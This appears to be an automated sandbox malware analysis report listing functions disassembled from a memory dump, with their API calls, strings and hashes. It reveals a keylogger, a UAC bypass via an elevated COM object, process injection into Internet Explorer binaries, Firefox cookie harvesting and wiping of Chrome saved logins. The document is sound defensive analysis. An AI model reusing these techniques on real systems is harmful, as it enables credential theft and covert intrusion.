Opcode ID: 18c6914aedbf4db8a083bc69dad6fea508443dcb85a011d8fffe1fc42ea87272
Instruction ID: 32b23487147a816041c30da2224dce557673570347bddc60567f1f366ddad262
Opcode Fuzzy Hash: 18c6914aedbf4db8a083bc69dad6fea508443dcb85a011d8fffe1fc42ea87272
Instruction Fuzzy Hash: 28417F3190021AAADB04FBA6DC569EEB768AF11704F50057FF506B20D2FF3C5A49CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3C2 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F3DC
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F407
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F423
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F4A2
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F4B1

Part of subcall function 0041C12B: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C143
Part of subcall function 0041C12B: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C156

CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F5BC

Strings

C:\Program Files(x86)\Internet Explorer\, xrefs: 0040F60C
ieinstal.exe, xrefs: 0040F623
ielowutil.exe, xrefs: 0040F664
Inj, xrefs: 0040F6B7

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
API String ID: 3756808967-1743721670
Opcode ID: 149f83f78c0dcefb94a93c5616230e5a81f93e49b46487426d8ad3e4f4ac1731
Instruction ID: 5018d2d9c90dbd6d6fe108ccdeab389871d3560f6d607c0aa7ec0a5772391e24
Opcode Fuzzy Hash: 149f83f78c0dcefb94a93c5616230e5a81f93e49b46487426d8ad3e4f4ac1731
Instruction Fuzzy Hash: B7714E705083429BC724EB21D8919AEB7A4AF94348F40483FF586631E3EF7C994DCB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00419575 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON

Download Yara Rule

Strings

VG, xrefs: 004195D9
2, xrefs: 00419642
5, xrefs: 00419757
7, xrefs: 00419778
0, xrefs: 0041959F
6, xrefs: 00419761
1, xrefs: 004195E3
4, xrefs: 00419706
3, xrefs: 004196A2

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7$VG
API String ID: 0-1861860590
Opcode ID: 13c334033b35c610f53346a6141b88d5a34a173366e14a26250f9f9a851070ab
Instruction ID: 9e09b7185deedc0a3188928efce079fdeb8dc50ce9f7ebeb8d7f12ba87488783
Opcode Fuzzy Hash: 13c334033b35c610f53346a6141b88d5a34a173366e14a26250f9f9a851070ab
Instruction Fuzzy Hash: C071C2709183019FD704EF21D8A2BEB7794AF45310F10491EF5A26B2D1DE78AB49CB97

Uniqueness

Uniqueness Score: -1.00%

Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00407521
CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

Strings

[+] ucmAllocateElevatedObject, xrefs: 00407508
[+] CoGetObject, xrefs: 00407561
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00407516, 0040751B, 0040755A
[-] CoGetObject FAILURE, xrefs: 0040758E
[+] CoGetObject SUCCESS, xrefs: 00407595
Elevation:Administrator!new:, xrefs: 00407542
$, xrefs: 0040753B

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: 76d15d0fb56d7a8d8e1e460f28c31beb9cf9d21763891b71753c9d2bdaa02437
Instruction ID: 08efd04b626cbfc978d5ebff47a7608052b1d371e0bd854913493cebd1a15ee8
Opcode Fuzzy Hash: 76d15d0fb56d7a8d8e1e460f28c31beb9cf9d21763891b71753c9d2bdaa02437
Instruction Fuzzy Hash: AB117372D04218BAD710E6959C46BDEB7BC9B08714F25007BF904B3382E77CAA4486BF

Uniqueness

Uniqueness Score: -1.00%

Function 0041A696 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A6AC
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A6FB
GetLastError.KERNEL32 ref: 0041A709
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A741

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 9429da188829ae0cc58a5dfaa5129494b7d068c4fc29835a0ae44944b6b66758
Instruction ID: 98f091b54933f8dc116b4dcc422d911b8a3664dfb3dab3f2e6005b1ed7f3cac0
Opcode Fuzzy Hash: 9429da188829ae0cc58a5dfaa5129494b7d068c4fc29835a0ae44944b6b66758
Instruction Fuzzy Hash: 49817471104301ABC314EF61D885DAFB7A8FF94709F50082EF185521A2EF78EE48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C29B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C2E9
FindNextFileW.KERNEL32(00000000,?), ref: 0040C3BC
FindClose.KERNEL32(00000000), ref: 0040C3CB
FindClose.KERNEL32(00000000), ref: 0040C3F6

Strings

\cookies.sqlite, xrefs: 0040C357
\Mozilla\Firefox\Profiles\, xrefs: 0040C2BC
AppData, xrefs: 0040C2A6

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 7b3dbf79728eeffbde2c82012aaf771e0194470edd515b0a4a403a1f858b0f8c
Instruction ID: fef4d65b9f20089db2f88367438c0b90451e8f61a7647c86833f6491ac69dca9
Opcode Fuzzy Hash: 7b3dbf79728eeffbde2c82012aaf771e0194470edd515b0a4a403a1f858b0f8c
Instruction Fuzzy Hash: DD315E3190021AAACB14F7A1DC9ADAE7778AF10718F10017FF506B20D2FF78994ACA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1DF Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C23A
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C26A
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2DC
DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2E9

Part of subcall function 0041C1DF: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2BF

GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C30A
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C320
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C327
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C330

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 571a63e77e9d579d1df3fcb8ff562e8e9559788ee97b6b046b3cc0c74534924d
Instruction ID: 658f290bacfa54b2639a90bd0fd1c4fed19c92f365caa476b4101e6107ecc85f
Opcode Fuzzy Hash: 571a63e77e9d579d1df3fcb8ff562e8e9559788ee97b6b046b3cc0c74534924d
Instruction Fuzzy Hash: 0731827284421CAADB20E7A1DC89EDB737CAF09305F5405FBF555D2052EB399EC88A58

Uniqueness

Uniqueness Score: -1.00%

Function 00419A43 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00419C99
FindNextFileW.KERNEL32(00000000,?,?), ref: 00419D65

Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A791), ref: 0041C3EC

Strings

8SG, xrefs: 00419B39
NG, xrefs: 00419A73
PXG, xrefs: 00419D7C
PG, xrefs: 00419B23
PXG, xrefs: 00419C16

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: 8SG$PXG$PXG$NG$PG
API String ID: 341183262-3812160132
Opcode ID: 505acaa33e9fd67565e545479f01f95fc05fc55d6017b708142bc93f10909bb5
Instruction ID: 244e5bd26970ee64e0f805b201a5ce69ae47f76faa5f1ec663fe2ae2e6e217cd
Opcode Fuzzy Hash: 505acaa33e9fd67565e545479f01f95fc05fc55d6017b708142bc93f10909bb5
Instruction Fuzzy Hash: F08175315082419BC314FB22DC56EEF73A9AF90344F40493FF546671E2EF789949C69A

Uniqueness

Uniqueness Score: -1.00%

Function 00413F18 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413FEB
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413FF7

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004141B8
GetProcAddress.KERNEL32(00000000), ref: 004141BF

Strings

SHDeleteKeyW, xrefs: 004141AE
Shlwapi.dll, xrefs: 004141B3

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: e63698ce317ceb4c4f851f637af5a7ea9b37e636c7e6601b3bec646b2a3448e3
Instruction ID: 641828d4a39e843f2430769769f5c1217e4fdfd89ddfed3c8fa3b4965f6deed4
Opcode Fuzzy Hash: e63698ce317ceb4c4f851f637af5a7ea9b37e636c7e6601b3bec646b2a3448e3
Instruction Fuzzy Hash: 8EB10672A0430066C614BB76CD579EE36A85FD1748F40053FF902B71E2EE7C9A4886DE

Uniqueness

Uniqueness Score: -1.00%

Function 00416702 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004178A0: GetCurrentProcess.KERNEL32(00000028,?), ref: 004178AD
Part of subcall function 004178A0: OpenProcessToken.ADVAPI32(00000000), ref: 004178B4
Part of subcall function 004178A0: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004178C6
Part of subcall function 004178A0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004178E5
Part of subcall function 004178A0: GetLastError.KERNEL32 ref: 004178EB

ExitWindowsEx.USER32 ref: 004167A4
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004167B9
GetProcAddress.KERNEL32(00000000), ref: 004167C0

Strings

!D@, xrefs: 00416FD7
PowrProf.dll, xrefs: 004167B4
SetSuspendState, xrefs: 004167AF

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: !D@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2876530381
Opcode ID: 9fcdfdf2e70f192820140de20959d418043f044d0dc70dfb4a0c18ce04bd27c8
Instruction ID: f6c6f585a36de8121c5df69adef47d76b6904e2c2d247bbf37b4588cde2b2bc5
Opcode Fuzzy Hash: 9fcdfdf2e70f192820140de20959d418043f044d0dc70dfb4a0c18ce04bd27c8
Instruction Fuzzy Hash: 87216FB060430156CE14FBB28896ABF72599F41788F41483FB542AB2D2EF3CD845CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B960 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B99C
GetLastError.KERNEL32 ref: 0040B9A6

Strings

UserProfile, xrefs: 0040B96C
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B967
[Chrome StoredLogins found, cleared!], xrefs: 0040B9CC
[Chrome StoredLogins not found], xrefs: 0040B9C0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: b827c5fc418e544337e776d4383bf840cd7da94323f47ab98b09c0da0df255b3
Instruction ID: eb8c66327cbd9852b634475a7665cab754f13b7e32d1a4412a60f723b3e04143
Opcode Fuzzy Hash: b827c5fc418e544337e776d4383bf840cd7da94323f47ab98b09c0da0df255b3
Instruction Fuzzy Hash: 83018FB1A401056ACA047BB6DD5B9BE7728E911704F50027BF902722E2FE7D49098ADE

Uniqueness

Uniqueness Score: -1.00%

Function 004178A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 004178AD
OpenProcessToken.ADVAPI32(00000000), ref: 004178B4
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004178C6
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004178E5
GetLastError.KERNEL32 ref: 004178EB

Strings

SeShutdownPrivilege, xrefs: 004178C0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409258

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
FindClose.KERNEL32(00000000), ref: 004093C1

Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C

FindClose.KERNEL32(00000000), ref: 004095B9

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
String ID:
API String ID: 1824512719-0
Opcode ID: 5f8d9dbab85d370993fc4c4966b41904945c3605371eb1279cff70fae7b0a79d
Instruction ID: 682ac26ed7e8a3fec7eea21b1f58d506290f673c60e7927747fbe341be509488
Opcode Fuzzy Hash: 5f8d9dbab85d370993fc4c4966b41904945c3605371eb1279cff70fae7b0a79d
Instruction Fuzzy Hash: 82B18E32900109AACB04FBA1DD96AEDB379AF04314F10417FF506B61E2EF785E49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3E0 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,00000000), ref: 0040A414
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A41F
GetKeyboardLayout.USER32 ref: 0040A426
GetKeyState.USER32(00000010), ref: 0040A430
GetKeyboardState.USER32(?), ref: 0040A43D
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A459

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: 844ac67e9bb01e022d5e1c3247d2b7046eb1d2e1975d077ec3cb4ec24acbdb08
Instruction ID: 281ffdbf1a9a39d400c3d2c64feb854b52b7ec9ef9c1b09e5e6af93a0c8d5dc5
Opcode Fuzzy Hash: 844ac67e9bb01e022d5e1c3247d2b7046eb1d2e1975d077ec3cb4ec24acbdb08
Instruction Fuzzy Hash: 89110C72900218FBDB109BA4ED49FDA7BBCEB4C715F000465FA04E6191D675EE54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A998 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A5EE,00000000), ref: 0041A9A1
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A5EE,00000000), ref: 0041A9B6
CloseServiceHandle.ADVAPI32(00000000,?,0041A5EE,00000000), ref: 0041A9C3
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A5EE,00000000), ref: 0041A9CE
CloseServiceHandle.ADVAPI32(00000000,?,0041A5EE,00000000), ref: 0041A9E0
CloseServiceHandle.ADVAPI32(00000000,?,0041A5EE,00000000), ref: 0041A9E3

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: f0a41ace0033e4adc6ed211f5b9a4713447c101ebbe7debfeabf45247fd2b7b8
Instruction ID: 1f56653cd1b33a3082ec54d54fd8d4841359485faa7b6e76ca92d08d0c7a47ff
Opcode Fuzzy Hash: f0a41ace0033e4adc6ed211f5b9a4713447c101ebbe7debfeabf45247fd2b7b8
Instruction Fuzzy Hash: BFF0E9B1111225AFD2115B219C88DFF376CDF81B66B00082AF901921919B68CC85B579

Uniqueness

Uniqueness Score: -1.00%

Function 0045237D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0045269C,?,00000000), ref: 00452416
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0045269C,?,00000000), ref: 0045243F
GetACP.KERNEL32(?,?,0045269C,?,00000000), ref: 00452454

Strings

ACP, xrefs: 0045239B
OCP, xrefs: 004523D1

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 8109e71563a39a3b26d0eb2584ef597fedb24f2fc8293daa357ab739a01d4f79
Instruction ID: d01d4c930f94fe8d1e613ea2bb83b6ad54fccc02e3db7858a1f0680e3809c62e
Opcode Fuzzy Hash: 8109e71563a39a3b26d0eb2584ef597fedb24f2fc8293daa357ab739a01d4f79
Instruction Fuzzy Hash: E521E532700200A6DB358B25DA00B9B73A6EF57B13F168467ED09D7212E7BADD45C358

Uniqueness

Uniqueness Score: -1.00%

Function 0041B3F6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B407
LoadResource.KERNEL32(00000000,?,?,0040F32C,00000000), ref: 0041B41B
LockResource.KERNEL32(00000000,?,?,0040F32C,00000000), ref: 0041B422
SizeofResource.KERNEL32(00000000,?,?,0040F32C,00000000), ref: 0041B431

Strings

SETTINGS, xrefs: 0041B3FA

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: fc30b558c4419b0a31bdf043ab49805da964fa505f7a1de0fc394f039a43b5e3
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: 98E01A36600B22EBEB211BA5AC4CD463E29F7C97637140075F90696231CB758840DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040966A
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: b6c9e42f210da4629bc958b5d5a8037a5563f119b7cf058d47e692f85f8f78a6
Instruction ID: 070a9d5dece77f020f22c6d3047f7193b13bcd532efb7b5f68a00bb5efad3e6d
Opcode Fuzzy Hash: b6c9e42f210da4629bc958b5d5a8037a5563f119b7cf058d47e692f85f8f78a6
Instruction Fuzzy Hash: 40811C329001199ACB15EBA1DC969EEB378AF14318F10417FE506B71E2FF789E49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00452551 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

Part of subcall function 004480D5: _free.LIBCMT ref: 00448134
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045265D
IsValidCodePage.KERNEL32(00000000), ref: 004526B8
IsValidLocale.KERNEL32(?,00000001), ref: 004526C7
GetLocaleInfoW.KERNEL32(?,00001001,004449AC,00000040,?,00444ACC,00000055,00000000,?,?,00000055,00000000), ref: 0045270F
GetLocaleInfoW.KERNEL32(?,00001002,00444A2C,00000040), ref: 0045272E

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: fa1670b29e0cff1f476005e56d7a6401a52f80e4e2cf6494cd076bea83c8f255
Instruction ID: 230a0f2966f322ebe53ce31d65220e852efde1a8d6b26a963b9ac082dbe1daf9
Opcode Fuzzy Hash: fa1670b29e0cff1f476005e56d7a6401a52f80e4e2cf6494cd076bea83c8f255
Instruction Fuzzy Hash: 4A51A471900209ABDF10DFA5DD45BBF73B8AF06702F08056BED04E7252E7B899498B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408811
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
__CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 98882c3fb8c382ebf1d08c0d059c7b5ad1d191f9937145677da36107fcb1e2f7
